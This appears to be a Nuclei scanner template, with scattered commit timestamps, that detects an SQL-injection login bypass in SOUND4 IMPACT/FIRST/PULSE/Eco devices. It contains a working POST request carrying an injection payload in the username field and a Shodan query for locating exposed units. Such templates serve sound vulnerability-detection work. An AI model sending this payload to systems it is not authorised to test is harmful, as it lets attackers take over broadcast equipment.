2023-10-17 07:20:28 +00:00
id : sound4-impact-auth-bypass
info :
name : SOUND4 IMPACT/FIRST/PULSE/Eco <= 2.x - Authentication Bypass
author : r3Y3r53
severity : high
description : |
The application suffers from an SQL Injection vulnerability. Input passed through the 'username' POST parameter in 'index.php' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication mechanism.
reference :
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5727.php
metadata :
verified : true
2023-10-17 17:52:26 +00:00
max-request : 1
2023-10-17 07:20:28 +00:00
shodan-query : http.favicon.hash:-1548359600
tags : sqli,zeroscience,sound4,auth-bypass
http :
- raw :
- |
POST /index.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2023-10-17 08:16:05 +00:00
2023-10-17 07:20:28 +00:00
username=%27%2Bjoxvy--%2Bz&password=ffesdf
redirects : true
max-redirects : 2
cookie-reuse : true
matchers :
- type : dsl
dsl :
- 'status_code == 200'
- 'contains_all(body, "Network Diagnostic:", "disconnect the user")'
condition : and
2023-10-20 11:41:13 +00:00
# digest: 4a0a00473045022068027427b8904bdf7b36be77e51555cf2d488965de236670dd1cd448d3bddb89022100a4daccda9f4f3add420cce4caaa30a97e1b2a95e8f6cf0ee99e982e976c8976a:922c64590222798bb761d5b6d8e72950